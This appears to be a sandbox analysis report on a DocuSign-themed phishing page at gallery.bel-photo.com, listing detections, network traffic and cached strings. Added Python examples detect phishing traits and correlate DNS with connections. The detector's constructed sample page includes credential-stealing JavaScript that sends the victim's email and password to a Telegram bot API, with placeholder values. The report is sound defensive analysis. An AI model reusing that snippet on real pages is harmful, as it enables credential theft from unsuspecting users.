Source: https://gallery.bel-photo.com/EU/ |
Avira URL Cloud: detection malicious, Label: phishing |
Source: https://gallery.bel-photo.com/EU/ |
SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering |
Source: https://gallery.bel-photo.com/EU/ |
LLM: Score: 8 brands: DocuSign Reasons: The URL 'gallery.bel-photo.com' does not match the legitimate domain associated with DocuSign, which is 'docusign.com'. The page asks for an email password to view a document, which is a common phishing technique to steal credentials. The domain name is suspicious and does not align with the brand's official domain. DOM: 0.0.pages.csv |
Source: https://gallery.bel-photo.com/EU/ |
Matcher: Template: docusign matched with high similarity |
Source: Yara match |
File source: 0.0.pages.csv, type: HTML |
Source: Yara match |
File source: dropped/chromecache_50, type: DROPPED |
Source: https://gallery.bel-photo.com/EU/ |
LLM: Score: 10 Reasons: The JavaScript code captures the user's email and password, then sends this sensitive information to a Telegram bot. This behavior is indicative of phishing and credential theft. DOM: 0.0.pages.csv |
Source: https://gallery.bel-photo.com/EU/ |
LLM: Score: 7 Reasons: The code extracts an email address from the URL hash and uses it to populate form fields and an image source. This behavior is typical of phishing attempts to personalize the page based on the user's email. Additionally, the use of external resources (e.g., logo.clearbit.com) could be used to track or identify the user. DOM: 0.0.pages.csv |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: Number of links: 0 |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: <input type="password" .../> found but no <form action="... |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: Title: View Secure Document - Sign in does not match URL |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: On click: sendEmail() |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: <input type="password" .../> found |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: No <meta name="author".. found |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: No <meta name="copyright".. found |
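The parser and LLM findings above (a password field with no `<form action>`, an `onclick` handler named `sendEmail()`, the e-mail address lifted from the URL hash, a logo fetched from logo.clearbit.com, credentials posted to a Telegram bot, a page title unrelated to the host) are all properties that can be checked statically over the cached HTML. The script below is an added example written for this page; it is not part of the report, the sandbox, or the kit. The sample page it scans is constructed to show those traits and is not the kit's code, the Telegram token and chat id in it are placeholders, and the indicator names and the simple count-based score are the example's own choices.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not the kit itself) with the traits the report
# lists: password field without a <form action>, onclick="sendEmail()",
# e-mail read from the URL hash, Clearbit logo lookup, Telegram exfil.
SAMPLE_HTML = """<html><head><title>View Secure Document - Sign in</title></head>
<body><img id="logo" src="https://logo.clearbit.com/">
<input type="email" id="email"><input type="password" id="passwd">
<button onclick="sendEmail()">View Document</button>
<script>
var email = window.location.hash.substring(1);
document.getElementById('email').value = email;
document.getElementById('logo').src = "https://logo.clearbit.com/" + email.split('@')[1];
var token = "TOKEN", chat_id = "0";  // placeholders, not real values
function sendEmail() {
  var p = document.getElementById('passwd').value;
  fetch(`https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=`
        + encodeURIComponent(email + ':' + p));
}
</script></body></html>"""

# Constructed benign control: same-origin form post, a link, no script tricks.
BENIGN_HTML = """<html><head><title>Example Login</title></head><body>
<a href="/help">Help</a><form action="/login" method="post">
<input type="text" name="user"><input type="password" name="pw">
<button type="submit">Sign in</button></form></body></html>"""


class _Collector(HTMLParser):
    # Gathers the DOM facts the heuristics in scan() need.
    def __init__(self):
        super().__init__()
        self.title, self.scripts = "", []
        self.input_types, self.form_actions, self.onclicks = [], [], []
        self.links, self.hosts = 0, set()
        self._in_title = self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "script":
            self._in_script = True
        elif tag == "input":
            self.input_types.append((a.get("type") or "text").lower())
        elif tag == "form":
            self.form_actions.append(a.get("action"))
        elif tag == "a":
            self.links += 1
        if a.get("onclick"):
            self.onclicks.append(a["onclick"])
        src = a.get("src") or ""
        if src.startswith(("http://", "https://")):
            self.hosts.add(urlparse(src).hostname)

    def handle_endtag(self, tag):
        if tag in ("title", "script"):   # the two never nest, so reset both
            self._in_title = self._in_script = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        if self._in_script:
            self.scripts.append(data)


def scan(html, page_url):
    """Return the indicators found; each key mirrors one report signature."""
    c = _Collector()
    c.feed(html)
    script = "\n".join(c.scripts)
    host = (urlparse(page_url).hostname or "").lower()
    found = {}
    if "password" in c.input_types:
        found["password_input"] = True
        if not any(c.form_actions):          # no <form action>: script must submit it
            found["password_without_form_action"] = True
    if c.onclicks:
        found["onclick_handlers"] = c.onclicks
    if c.links == 0:
        found["no_links"] = True
    if re.search(r"api\.telegram\.org/bot", script):   # match host+path, not a token
        found["telegram_bot_exfil"] = True
    if re.search(r"location\.hash", script):
        found["email_from_url_hash"] = True
    if "logo.clearbit.com" in c.hosts:
        found["clearbit_logo_lookup"] = True
    words = re.findall(r"[a-z]{4,}", c.title.lower())
    if words and not any(w in host for w in words):   # no title word in the host
        found["title_url_mismatch"] = c.title.strip()
    found["score"] = len(found)
    return found
```

Running `scan(SAMPLE_HTML, "https://gallery.bel-photo.com/EU/")` returns all eight indicators, while the benign control only trips `password_input`. The Telegram check matches on the host and path prefix rather than on a token because the cached-file string in this report ends at `bot$`, which is consistent with the token being spliced in at runtime; the Clearbit check fires on the bare `https://logo.clearbit.com/` too, which is what the browser requested here when no e-mail was present in the hash.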
Source: unknown |
HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.6:49714 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.6:49717 version: TLS 1.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected:
GET /EU/ HTTP/1.1
Host: gallery.bel-photo.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected:
GET /data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.png HTTP/1.1
Host: cdn4.iconfinder.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected:
GET /C8yD9g5/US-payment-terms-1.jpg HTTP/1.1
Host: i.ibb.co
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected:
GET /data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.png HTTP/1.1
Host: cdn4.iconfinder.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected:
GET / HTTP/1.1
Host: logo.clearbit.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected:
GET /C8yD9g5/US-payment-terms-1.jpg HTTP/1.1
Host: i.ibb.co
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected:
GET /fs/windows/config.json HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
Range: bytes=0-2147483646
User-Agent: Microsoft BITS/7.8
Host: fs.microsoft.com |
Source: global traffic |
DNS traffic detected: DNS query: gallery.bel-photo.com |
Source: global traffic |
DNS traffic detected: DNS query: cdn4.iconfinder.com |
Source: global traffic |
DNS traffic detected: DNS query: i.ibb.co |
Source: global traffic |
DNS traffic detected: DNS query: logo.clearbit.com |
Source: global traffic |
DNS traffic detected: DNS query: www.google.com |
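The many "TCP/UDP traffic detected without corresponding DNS query" entries above come from one heuristic: every connection is checked against the set of addresses returned by DNS answers seen earlier in the capture, and anything not in that set is reported. The report only lists the names that were queried, not the answers, so it cannot be told from this page whether 2.18.97.153 or 173.222.162.64 were ever returned for one of those names. The UDP entries for 1.1.1.1 show one blind spot directly: that address is the resolver, and DNS transport can never be preceded by a DNS answer for itself. The correlator below is an added example written for this page, not the sandbox's own logic; its event log is constructed, uses RFC 5737 documentation addresses for the resolved hosts, and includes 2.18.97.153 from the report as the never-resolved destination.

```python
from collections import defaultdict

# Constructed event log (not the sandbox's records). Tuples are either
# ("dns", ts, queried_name, [answer_ips]) or (proto, ts, src, dst, dport).
EVENTS = [
    ("tcp", 0.5, "192.168.2.6", "198.51.100.7", 443),   # contacted before its answer
    ("udp", 0.9, "192.168.2.6", "1.1.1.1", 53),          # the resolver itself
    ("dns", 1.0, "gallery.bel-photo.com", ["203.0.113.10"]),
    ("tcp", 1.1, "192.168.2.6", "203.0.113.10", 443),
    ("tcp", 1.3, "192.168.2.6", "2.18.97.153", 443),     # never resolved in capture
    ("dns", 1.5, "i.ibb.co", ["198.51.100.7"]),
    ("tcp", 1.6, "192.168.2.6", "198.51.100.7", 443),
    ("tcp", 1.7, "192.168.2.6", "2.18.97.153", 443),
]


def unresolved_destinations(events, resolvers=("1.1.1.1",)):
    """Map each destination IP contacted before (or without) a DNS answer
    naming it to the timestamps of those connections.

    Traffic to a configured resolver on port 53 is the DNS transport and can
    never have a preceding answer for itself, so it is skipped, not flagged.
    Connections that precede the answer (cached DNS, resolution before the
    capture started) are still flagged, exactly as the sandbox heuristic does.
    """
    answered = set()
    flagged = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[1]):      # replay in time order
        if ev[0] == "dns":
            answered.update(ev[3])
            continue
        _proto, ts, _src, dst, dport = ev
        if dst in resolvers and dport == 53:
            continue
        if dst not in answered:
            flagged[dst].append(ts)
    return dict(flagged)


def hit_counts(events, **kw):
    """Per-IP count, the form in which the report repeats these events."""
    return {ip: len(ts) for ip, ts in unresolved_destinations(events, **kw).items()}
```

With the default resolver list the replay flags 2.18.97.153 twice and 198.51.100.7 once (the 0.5 s connection that preceded its answer), and nothing for 203.0.113.10; passing `resolvers=()` reproduces the report's behaviour of also listing the resolver. When triaging such entries, the first question is therefore whether the capture's DNS answers were logged at all and whether the client could have resolved the name before the capture began, not whether the IP is malicious.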
Source: chromecache_50.2.dr |
String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js |
Source: chromecache_50.2.dr |
String found in binary or memory: https://api.telegram.org/bot$ |
Source: chromecache_50.2.dr |
String found in binary or memory: https://cdn4.iconfinder.com/data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.pn |
Source: chromecache_50.2.dr |
String found in binary or memory: https://i.ibb.co/C8yD9g5/US-payment-terms-1.jpg |
Source: chromecache_50.2.dr |
String found in binary or memory: https://logo.clearbit.com/ |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49674 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49672 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49729 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49698 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49698 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49673 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49729 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: classification engine |
Classification label: mal76.phis.win@16/12@14/10 |
Source: unknown |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1904,i,7118842407287733611,2763941164702306614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
Source: unknown |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gallery.bel-photo.com/EU/" |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1904,i,7118842407287733611,2763941164702306614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Source: Window Recorder |
Window detected: More than 3 window changes detected |